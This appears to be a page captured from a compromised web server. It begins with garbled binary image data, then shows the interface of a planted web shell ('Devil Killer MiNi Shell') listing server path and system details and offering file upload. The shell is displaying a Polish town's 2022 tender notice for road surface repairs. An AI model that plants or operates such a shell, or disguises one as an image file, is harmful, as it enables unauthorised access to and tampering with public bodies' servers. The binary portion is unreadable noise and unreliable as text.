JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220615/0020996001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34; Remonty cząstkowe nawierzchni bitumicznych dróg gminnych na terenie Miasta Szklarska Poręba w roku 2022 &#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO SZKLARSKA PORĘBA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821641</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Granitowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szklarska Poręba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-580</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757547715</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757547724</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">fundusze@szklarskaporeba.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.szklarskaporeba.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34; Remonty cząstkowe nawierzchni bitumicznych dróg gminnych na terenie Miasta Szklarska Poręba w roku 2022 &#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2ebc212c-ec76-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00209960</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2ebc212c-ec76-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz do komunikacji”.<br/>2 .Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały<br/>w Regulaminie korzystania z systemu e-zamówienia (https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP – https://www.gov.pl.web/gov/warunki-korzystania).<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia, akceptuje warunki korzystania z platformy e-<br/>Zamówienia , określone w w/w Regulaminie oraz zobowiązuje się korzystając z platformy przestrzegając postanowień tego<br/>regulaminu.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularza do złożenia, zmiany,<br/>wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. Natomiast<br/>w przypadku komunikacji z Zamawiającym za pośrednictwem poczty elektronicznej (e-mail), wielkość plików przesyłanych<br/>jednorazowo wynosi maksymalnie 20 MB (bez względu na ilość załączników).<br/>4. Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki i nie<br/>mogą być szyfrowane. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty<br/>elektronicznej, na adres email wskazany w pkt 2;<br/>5. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi<br/>w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania<br/>i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415).<br/>6. Adres skrzynki podawczej Zamawiającego (Elektroniczna Skrzynka Podawcza): /SzklarskaPoreba/SkrytkaESP4. Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, .7Z. Wśród formatów powszechnych a NIE<br/>występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>7. Złożenie oferty wymaga założenia konta po zarejestrowaniu na stronie https://ezamowienia.gov.pl/. Sposób korzystania, opisany<br/>został w Regulaminie korzystania z portalu e-Zamówienia.<br/>8. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku<br/>wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz z plikami<br/>stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP).</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) nr<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego rozporządzenia o ochronie danych) Dz. Urz.<br/>UE L 119 z dnia 04.05.2016 r., zwanego dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Szklarskiej Poręby z siedzibą w Szklarskiej Porębie przy ul.<br/>Granitowej 2;<br/>2) w sprawach danych osobowych może Pani/Pan kontaktować się z wyznaczonym przez administratora Inspektorem Ochrony<br/>Danych na adres email: iod@szklarskaporeba.pl lub pisemnie na adres siedziby administratora;<br/>3) Pani/Pana dane osobowe przetwarzane będą w celu, w jakim administrator je od Pani/Pana pozyskał<br/>i w zakresie niezbędnym do:<br/>a) wypełnienia obowiązku prawnego ciążącego na administratorze – w związku z przepisami ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych – w celu realizacji przedmiotowego postępowania o udzielenie zamówienia, tj. wyboru<br/>najkorzystniejszej oferty – na podstawie art. 6 ust. 1 pkt c RODO;<br/>b) zawarcia i wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane<br/>dotyczą, przed zawarciem umowy – na podstawie art. 6 ust. 1 pkt b RODO;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym administrator zobowiązany jest lub może<br/>przekazywać Pani/Pana dane osobowe na mocy przepisów prawa – w szczególności w oparciu o art. 18 oraz art. 74 ustawy z dnia<br/>11 września 2019 r. Prawo zamówień publicznych – jak również inne podmioty<br/>zewnętrzne wspierające administratora w wypełnieniu ciążącego na nim obowiązku prawnego, poprzez świadczenie usług<br/>informatycznych, doradczych, konsultacyjnych, audytowych, pocztowych, finansowych, windykacyjnych oraz pomocy prawnej oraz podmioty przetwarzające, z którymi administrator zawarł umowy powierzenia przetwarzania danych;<br/>5) Pani/Pana dane nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej;<br/>6) Pani/Pana dane osobowe będą przetwarzane w ramach dokumentacji prowadzonej przez administratora<br/>w formie elektronicznej i papierowej na podstawie przepisów prawa dotyczących archiwizacji, przez okres niezbędny do realizacji<br/>celów przetwarzania wskazanych w pkt 3, lecz nie krócej niż okres wskazany<br/>w przepisach o archiwizacji. Oznacza to, że dane osobowe przetwarzane w celu:<br/>a) o którym mowa w pkt 3 lit. a, mogą zostać zniszczone po upływie 5 lat po zakończeniu postępowania<br/>o udzielenie zamówienia publicznego – zgodnie z jednolitym rzeczowym wykazem akt organów powiatu i starostw powiatowych;<br/>b) o którym mowa w pkt 3 lit. b, mogą zostać zniszczone po upływie 10 lat po wygaśnięciu umowy w sprawie zamówienia<br/>publicznego – zgodnie z jednolitym rzeczowym wykazem akt organów powiatu i starostw powiatowych;<br/>7) posiada Pani/Pan prawo do:<br/>a) na podstawie art. 15 RODO – dostępu do treści swoich danych osobowych – z zastrzeżeniem ograniczenia prawa do dostępu do<br/>danych, tj. w przypadku korzystania przez Panią/Pana z uprawnienia, o którym mowa w art. 15 ust. 1-3 RODO, może być Pani/Pan<br/>zobowiązana/y przez Zamawiającego na podstawie<br/>żądania, o którym mowa w art. 75 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>b) na podstawie art. 16 RODO – sprostowania swoich danych osobowych – przy czym skorzystanie z uprawnienia do sprostowania<br/>lub uzupełnienia Pani/Pana danych osobowych, o którym mowa w art. 16 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c) na podstawie art. 18 RODO – żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**. Zgłoszenie w postępowaniu<br/>o udzielenie zamówienia żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO – zgodnie z art. 19 ust. 3<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania;<br/>8) ma Pani/Pan prawo wniesienia skargi do Urzędu Ochrony Danych Osobowych w Warszawie, ul. Stawki 2,<br/>00-192 Warszawa, w sytuacji gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>9) podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, w przypadku, kiedy cel, w jakim Pani/Pan je podaje,<br/>skutkuje koniecznością wypełnienia przez administratora obowiązku prawnego ciążącego na administratorze, a ponadto jest<br/>warunkiem zawarcia oraz wykonania umowy w sprawie zamówienia publicznego. W takim przypadku jest Pani/Pan<br/>zobowiązana/zobowiązany do ich podania, a ewentualne ich niepodanie będzie skutkowało brakiem możliwości przeprowadzenia<br/>oceny złożonej przez Panią/Pana oferty oraz oświadczeń i dokumentów złożonych przez Panią/Pana w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu i braku podstaw do wykluczenia, a ponadto – w przypadku wyboru Pani/Pana oferty –<br/>brakiem możliwości zawarcia umowy lub jej wykonania albo nieprawidłowym wykonaniem umowy;<br/>10) nie przysługuje Pani/Panu<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO – prawo do usunięcia danych osobowych,<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>• na podstawie art. 21 RODO – prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11) w oparciu o zebrane dane osobowe administrator nie będzie podejmował wobec Pani/Pana zautomatyzowanych decyzji, w tym<br/>decyzji będących wynikiem profilowania, stosowanie do art. 22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. W ramach realizacji zamówienia Zamawiający planuje remont cząstkowy powierzchni 1500 m2 nawierzchni bitumicznych dróg na terenie miasta Szklarska Poręba.<br/>1.	Remont cząstkowy nawierzchni polegać będzie na frezowaniu na głębokość średnio 6 cm.<br/>2.	Pionowe odcięcie (najlepiej diamentowymi piłami tarczowymi) krawędzi uszkodzenia na głębokość umożliwiającą wyrównania jego dna, nadając uszkodzeniu kształt prostej figury geometrycznej np. prostokąta.<br/>3. Oczyszczeniu mechanicznym lub ręcznym miejsca przewidywanej naprawy obejmujące usunięcie luźnych okruchów nawierzchni i wody (doprowadzając uszkodzone miejsce do stany powietrzno – suchego), dokładne oczyszczenie dna i krawędzi uszkodzonego miejsca z wszelkiego rodzaju grysu, żwiru, piasku i pyłu itp 4.	Po przygotowaniu uszkodzonego miejsca nawierzchni do naprawy należy spryskać dno i boki naprawianego miejsca szybko rozpadową kationową emulsją asfaltową w ilości 0,5 l/m2 lub alternatywnie można przykleić samoprzylepne taśmy asfaltowo – polimerowe. <br/>5.	Uzupełnienie ubytku masą bitumiczną na gorąco, drobnoziarnistą, zagęszczenie ułożonej masy bitumicznej walcem i zabezpieczeniem krawędzi emulsją.<br/>6.	W przypadku gdy ubytek znajduje się w sąsiedztwie urządzeń kanalizacyjnych tj. włazów studni kanalizacji sanitarnej lub deszczowej oraz kratek ściekowych należy wyregulować je do wysokości umożliwiającej spływ wody deszczowej. Technologie usuwania uszkodzeń nawierzchni i materiały użyte do tego celu powinny być dostosowane do rodzaju i wielkości uszkodzenia.<br/>7.	Prace wykonywane będą po zleceniu przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kwota + gwarancja</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunków w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile wynika to z odrębnych przepisów) - Zamawiający nie stawia warunków w tym zakresie,<br/>3) sytuacji ekonomicznej lub finansowej – Wykonawca spełni obowiązek jeżeli wykaże, że posiada polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 300 000 zł.<br/>4) zdolności technicznej lub zawodowej - Wykonawca spełni warunek jeżeli:<br/>a.	wykaże, że w ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedno zamówienie w ciągu roku, polegające na usłudze bieżącej konserwacji bądź robotach budowlanych, które polegały na przebudowie lub rozbudowie drogi o wartości min. 300 000zł. <br/>b. wskaże, że dysponuje lub będzie dysponował w szczególności n/w sprzętem budowlanym, który będzie używał w celu wykonania zamówienia:<br/>• 1 skrapiarką lepiszcza,<br/>• 1 walcem,<br/>• 1 sprężarką. <br/>Wykonawca może dysponować sprzętem alternatywnym o porównywalnych parametrach i funkcjonalności <br/>z wymienionymi powyżej, adekwatnymi do danego zakresu robót, dołączając do oferty uzasadnienie swojej propozycji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wraz<br/>z ofertą składaną w odpowiedzi na ogłoszenie o zamówieniu, należy złożyć następujące oświadczenia<br/>i dokumenty:<br/>1) aktualne na dzień składania oferty oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału<br/>w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp. (wzór oświadczenia - załącznik nr 1 do SWZ);<br/>2) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania – odpis lub informację<br/>z krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>3) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy albo Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – jeżeli umocowanie do reprezentowania przez osobę działającą w imieniu Wykonawcy<br/>lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie wynika z dokumentów, o których mowa w pkt. 2.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 pkt. 1, stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu z postępowania. Oświadczenie to tymczasowo zastępuje wymagane przez Zamawiającego – na późniejszym etapie<br/>postępowania – podmiotowe środki dowodowe, które należy złożyć wraz z ofertą – w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym – oraz należy je skompresować wraz z plikami stanowiącymi<br/>ofertę do jednego pliku archiwum (.zip).<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa<br/>w ust. 1 pkt. 1 składa każdy z tych Wykonawców – w celu potwierdzenia braku podstaw wykluczenia oraz spełnienia warunków<br/>udziału w postępowaniu.<br/>4. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt. 2, jeżeli Zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>5. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w ust. 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak 